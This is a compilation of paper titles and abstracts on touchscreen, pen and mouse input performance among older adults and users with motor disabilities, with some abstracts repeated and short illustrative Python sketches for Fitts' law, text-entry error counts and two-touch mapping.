paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people.
Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions. In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. 
Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. 
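Several of the studies above (for example the "Slipping and drifting" menu and Fitts' tapping tasks, and the smartphone pointing experiments that vary target size and spacing) summarise pointing difficulty through movement distance, target width, speed and accuracy. Fitts' index of difficulty is the usual way to express that trade-off. The sketch below is illustrative only and is not taken from any of the cited papers; the trial data are made up, and it simply computes the Shannon-formulation index of difficulty and a mean throughput.

```python
import math
from statistics import mean

def index_of_difficulty(distance_mm: float, width_mm: float) -> float:
    """Shannon formulation of Fitts' index of difficulty, in bits."""
    return math.log2(distance_mm / width_mm + 1.0)

def throughput(trials) -> float:
    """Mean throughput (bits/s) over (distance_mm, width_mm, movement_time_s) trials."""
    return mean(index_of_difficulty(d, w) / t for d, w, t in trials)

if __name__ == "__main__":
    # Hypothetical tapping trials: 5, 8 and 12 mm targets at a 40 mm movement
    # distance, with assumed movement times (not data from the cited studies).
    trials = [(40.0, 5.0, 1.9), (40.0, 8.0, 1.4), (40.0, 12.0, 1.1)]
    for d, w, t in trials:
        print(f"target {w:4.1f} mm: ID = {index_of_difficulty(d, w):.2f} bits")
    print(f"mean throughput = {throughput(trials):.2f} bits/s")
```

Larger targets lower the index of difficulty, which is one way to read the repeated finding above that older users benefit disproportionately from bigger buttons.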
--- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involve few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack tactile feedback and motor stability, making it difficult to type effectively on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly.
In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design, the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in the daily life. It is intuition-oriented and easy to operate. There are a lot of elements that affect the small screen touch performance. One of the essential parts is icon feedback. However, to merely achieve beautiful icon feedback appearance and create interesting interaction experience, many interface designers ignore the real user needs. It is critical for them to trade off the icon feedback type associated with the different users needs in the touch interaction. This is especially important when the user capability is very limited. This paper described a pilot study for identifying factors that determine the icon feedback usability on small touch screen in four older adult Cognitrone groups since current research aimed mostly at general icon guidelines and recommendations and failed to consider and define the specific needs of small touch screen interfaces for the elderly. In this paper, we present a concept centred on human needs and use a cognitive assessment tool, the Cognitrone test, to measure older adults' attention and concentration capability and learn more about how to evaluate and design suitable small screen icon feedback types. Forty-five elderly participants took part.
Each subject was asked to complete a battery of Cognitrone tests and divided into 4 groups. Each subject was also requested to perform a set of `continuous touch' usability tasks on small touch screen and comment on open-ended questions. Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screen. It showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for the Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. 
As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Comparison between single-touch and multi-touch interaction for older people paper_content: This paper describes a study exploring the multi-touch interaction for older adults. The aim of this experiment was to check the relevance of this interaction versus single-touch interaction to realize object manipulation tasks: move, rotate and zoom. For each task, the user had to manipulate a rectangle and superimpose it to a picture frame. Our study shows that adults and principally older adults had more difficulties to realize these tasks for multi-touch interaction than for single-touch interaction. --- paper_title: Effect of computer mouse gain and visual demand on mouse clicking performance and muscle activation in a young and elderly group of experienced computer users. paper_content: The present study evaluated the specific effects of motor demand and visual demands on the ability to control motor output in terms of performance and muscle activation. Young and elderly subjects performed multidirectional pointing tasks with the computer mouse. Three levels of mouse gain and three levels of target size were used. All subjects demonstrated a reduced working speed and hit rate at the highest mouse gain (1:8) when the target size was small. The young group had an optimum at mouse gain 1:4. The elderly group was most sensitive to the combination of high mouse gain and small targets and thus, this age group should avoid this combination. Decreasing target sizes (i.e. increasing visual demand) reduced performance in both groups despite that motor demand was maintained constant. Therefore, it is recommended to avoid small screen objects and letters. Forearm muscle activity was only to a minor degree influenced by mouse gain (and target sizes) indicating that stability of the forearm/hand is of significance during computer mouse control. The study has implications for ergonomists, pointing device manufacturers and software developers. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. 
However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: Performance and muscle activity during computer mouse tasks in young and elderly adults paper_content: The influence of age on performance and muscle activity was studied during computer mouse tasks designed to induce high demands on motor control. Eight young (mean age 25 years) and nine elderly (mean age 63 years) women participated. When the speed was self-determined, the elderly subjects performed 13%-18% slower than did the young. When speed was predefined, the error rate was higher in the elderly subjects than in the young ones (medium precision 7.8% compared to 2.5%, high precision 16.5% compared to 7.9%, respectively). The highest error rate was found for double-clicking (32.9% compared to 13.5%, respectively). The reduced performance in the elderly subjects was hypothesised to be a combined effect of deteriorated proprioception, increased motor unit size, and changes in the central nervous system. Electrical activity (EMG) was recorded from the forearm, shoulder and neck muscles. Higher levels of EMG activity were found in the elderly compared to the young. A likely explanation is that the impaired motor control necessitated an increased muscle activity. The highest levels of EMG activity and lack of EMG gaps were found for the forearm extensor muscles, especially the extensor digitorum muscle (mean EMG activity 10.4% compared to 8.1% of maximal electrical activity, EMGmax) whereas lower EMG activity levels were found for the shoulder region (e.g. right trapezius muscle mean EMG 2.8% compared to 1.1% EMGmax, respectively). The latter was possibly due to a relieving effect of the forearm support. Differences in muscle activity among the tasks were found, however they were minor for the shoulder and neck muscles. Consideration of the demands on motor control when designing user interfaces is recommended, to the benefit of both the young and the elderly. --- paper_title: Evaluating swabbing: a touchscreen input method for elderly users with tremor paper_content: Elderly users suffering from hand tremor have difficulties interacting with touchscreens because of finger oscillation. It has been previously observed that sliding one's finger across the screen may help reduce this oscillation. In this work, we empirically confirm this advantage by (1) measuring finger oscillation during different actions and (2) comparing error rate and user satisfaction between traditional tapping and swabbing in which the user slides his finger towards a target on a screen edge to select it. 
We found that oscillation is generally reduced during sliding. Also, compared to tapping, swabbing resulted in improved error rates and user satisfaction. We believe that swabbing will make touchscreens more accessible to senior users with tremor. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: Gestural interfaces for elderly users: Help or hindrance paper_content: In this paper we investigate whether finger gesture input is a suitable input method, especially for older users (60+) with respect to age-related changes in sensory, cognitive and motor abilities. We present a study in which we compare a group of older users to a younger user group on a set of 42 different finger gestures on measures of speed and accuracy. The size and the complexity of the gestures varied systematically in order to find out how these factors interact with age on gesture performance. The results showed that older users are a little slower, but not necessarily less accurate than younger users, even on smaller screen sizes, and across different levels of gesture complexity. This indicates that gesture-based interaction could be a suitable input method for older adults. At least not a hindrance - maybe even a help. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. 
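The text-entry study above classifies typing errors into insertions, substitutions and omissions. The cited papers do not publish their analysis code, so the sketch below is only an assumed, minimal implementation of that taxonomy: it aligns the presented and transcribed strings with a standard minimum edit distance (Wagner-Fischer) backtrace and counts each error type at the character level.

```python
def classify_errors(presented: str, transcribed: str) -> dict:
    """Count omissions (deletions), insertions and substitutions between the
    presented text and what the user actually typed, via a minimum edit
    distance alignment with backtrace. Character-level classification is an
    assumption; the cited studies may have used a different granularity."""
    n, m = len(presented), len(transcribed)
    # dp[i][j] = edit distance between presented[:i] and transcribed[:j]
    dp = [[0] * (m + 1) for _ in range(n + 1)]
    for i in range(n + 1):
        dp[i][0] = i
    for j in range(m + 1):
        dp[0][j] = j
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            cost = 0 if presented[i - 1] == transcribed[j - 1] else 1
            dp[i][j] = min(dp[i - 1][j] + 1,        # omission of presented[i-1]
                           dp[i][j - 1] + 1,        # insertion of transcribed[j-1]
                           dp[i - 1][j - 1] + cost) # match or substitution
    counts = {"omissions": 0, "insertions": 0, "substitutions": 0}
    i, j = n, m
    while i > 0 or j > 0:
        if (i > 0 and j > 0 and
                dp[i][j] == dp[i - 1][j - 1] + (presented[i - 1] != transcribed[j - 1])):
            if presented[i - 1] != transcribed[j - 1]:
                counts["substitutions"] += 1
            i, j = i - 1, j - 1
        elif i > 0 and dp[i][j] == dp[i - 1][j] + 1:
            counts["omissions"] += 1
            i -= 1
        else:
            counts["insertions"] += 1
            j -= 1
    return counts

if __name__ == "__main__":
    # Made-up example phrases, not data from the cited experiments.
    print(classify_errors("the quick brown fox", "teh quick brwn foxx"))
```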
--- paper_title: Developing a Touchscreen-based Domotic Tool for Users with Motor Disabilities paper_content: Domotics refers to the set of informatics and electronics systems able to automate, control and monitor a home. Accessibility can be defined as the users' potential for interaction, regardless of their technical, cognitive or physical abilities. Domotics usually focuses on the "intelligent home" concept, without explicitly considering the benefits that accessible services can provide for people with special needs. The paper presents the developing process of a domotic tool prototype that allows users with motor disabilities to control the surrounding artifacts of their home through the use of a touch screen-based mobile device. The prototype was developed using a user-centered design process, which explicitly includes usability and accessibility issues. The validation of the tool was conducted through analysis that involved (1) usability specialists, (2) physical therapists, and (3) real users from Teleton Foundation, a Chilean institution focused on rehabilitation and integration into society of children and adolescents who have motor disabilities. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Indirect mappings of multi-touch input using one and two hands paper_content: Touchpad and touchscreen interaction using multiple fingers is emerging as a valuable form of high-degree-of-freedom input. While bimanual interaction has been extensively studied, touchpad interaction using multiple fingers of the same hand is not yet well understood. We describe two experiments on user perception and control of multi-touch interaction using one and two hands. The first experiment addresses how to maintain perceptual-motor compatibility in multi-touch interaction, while the second measures the separability of control of degrees-of-freedom in the hands and fingers. Results indicate that two-touch interaction using two hands is compatible with control of two points, while twotouch interaction using one hand is compatible with control of a position, orientation, and hand-span. A slight advantage is found for two hands in separating the control of two positions. 
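The multi-touch mapping study above reports that one-handed, two-touch input is compatible with controlling a position, an orientation and a hand-span. The sketch below shows that decomposition under stated assumptions: the function and type names are hypothetical and the coordinates are invented, but the geometry (midpoint of the two contacts, angle of the line joining them, and their separation) is the straightforward way to derive those three degrees of freedom from two touch points.

```python
import math
from typing import NamedTuple, Tuple

Point = Tuple[float, float]

class OneHandPose(NamedTuple):
    x: float          # position: midpoint of the two touches
    y: float
    angle_deg: float  # orientation: angle of the line joining the touches
    span: float       # hand-span: distance between the touches

def two_touch_to_pose(p1: Point, p2: Point) -> OneHandPose:
    """Map two same-hand touch points to a position/orientation/span triple,
    the decomposition the study above found compatible with one-handed input."""
    (x1, y1), (x2, y2) = p1, p2
    dx, dy = x2 - x1, y2 - y1
    return OneHandPose(
        x=(x1 + x2) / 2.0,
        y=(y1 + y2) / 2.0,
        angle_deg=math.degrees(math.atan2(dy, dx)),
        span=math.hypot(dx, dy),
    )

if __name__ == "__main__":
    # Hypothetical thumb and index finger contacts (screen coordinates in mm).
    print(two_touch_to_pose((40.0, 60.0), (70.0, 90.0)))
```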
--- paper_title: Hand Grip Strength on a Large PDA: Holding While Reading Is Different from a Functional Task paper_content: Several studies have been done measuring preferred hand grip strength, but none of them has measured preferred hand strength on a PDA or similar device when it is held and used. We measured dominant hand strength in two conditions similar to real PDA use, resting forearms on a table and holding the PDA without table support. We found that adult participants squeeze the device with their preferred hand significantly more than with their nonpreferred hand while holding. In addition, we examined users' hand strength while they were tapping on the back of the device with their right and left index fingers. Our results were different than expected from previous studies, as we found that there was no significant difference in dominant and non-dominant hand strength during back tapping. Also, participants' non-preferred hand strength was not significantly different from their preferred hand strength when they tapped on the back of the device. The results show that in such functional use during tapping, the dominant and non-dominant hands are used similarly, which will contribute to future designs for PDAs and their interfaces. Our results may also contribute to design for more comfortable devices for users with hand disabilities. --- paper_title: Effect of touch screen button size and spacing on touch characteristics of users with and without disabilities. paper_content: OBJECTIVE: The aim of this study was to investigate the effect of button size and spacing on touch characteristics (forces, impulses, and dwell times) during a digit entry touch screen task. A secondary objective was to investigate the effect of disability on touch characteristics. BACKGROUND: Touch screens are common in public settings and workplaces. Although research has examined the effect of button size and spacing on performance, the effect on touch characteristics is unknown. METHOD: A total of 52 participants (n = 23, fine motor control disability; n = 14, gross motor control disability; n = 15, no disability) completed a digit entry task. Button sizes varied from 10 mm to 30 mm, and button spacing was 1 mm or 3 mm. RESULTS: Touch characteristics were significantly affected by button size. The exerted peak forces increased 17% between the largest and the smallest buttons, whereas impulses decreased 28%. Compared with the fine motor and nondisabled groups, the gross motor group had greater impulses (98% and 167%, respectively) and dwell times (60% and 129%, respectively). Peak forces were similar for all groups. CONCLUSION: Button size but not spacing influenced touch characteristics during a digit entry task. The gross motor group had significantly greater dwell times and impulses than did the fine motor and nondisabled groups. APPLICATION: Research on touch characteristics, in conjunction with that on user performance, can be used to guide human computer interface design strategies to improve accessibility of touch screen interfaces. Further research is needed to evaluate the effect of the exerted peak forces and impulses on user performance and fatigue. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen-based target acquisition difficulty.
In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Use of force plate instrumentation to assess kinetic variables during touch screen use paper_content: Touch screens are becoming ubiquitous technology, allowing for enhanced speed and convenience of user interfaces. To date, the majority of touch screen usability studies have focused on timing and accuracy of young, healthy individuals. This information alone may not be sufficient to improve accessibility and usability of touch screens. Kinetic data (e.g. force, impulse, and direction) may provide valuable information regarding human performance during touch screen use. Since kinetic information cannot be measured with a touch screen alone, touch screen-force plate instrumentation, software, and methodology were developed. Individuals with motor control disabilities (Cerebral Palsy and Multiple Sclerosis), as well as gender- and age-matched non-disabled participants, completed a pilot reciprocal tapping task to evaluate the validity of this new instrumentation to quantify touch characteristics. Results indicate that the instrumentation was able to successfully evaluate performance and kinetic characteristics. The kinetic information measured by the new instrumentation provides important insight into touch characteristics which may lead to improved usability and accessibility of touch screens. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. 
People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Effect of sitting or standing on touch screen performance and touch characteristics. paper_content: OBJECTIVE: The aim of this study was to evaluate the effect of sitting and standing on performance and touch characteristics during a digit entry touch screen task in individuals with and without motor-control disabilities. BACKGROUND: Previously, researchers of touch screen design have not considered the effect of posture (sitting vs. standing) on touch screen performance (accuracy and timing) and touch characteristics (force and impulse).
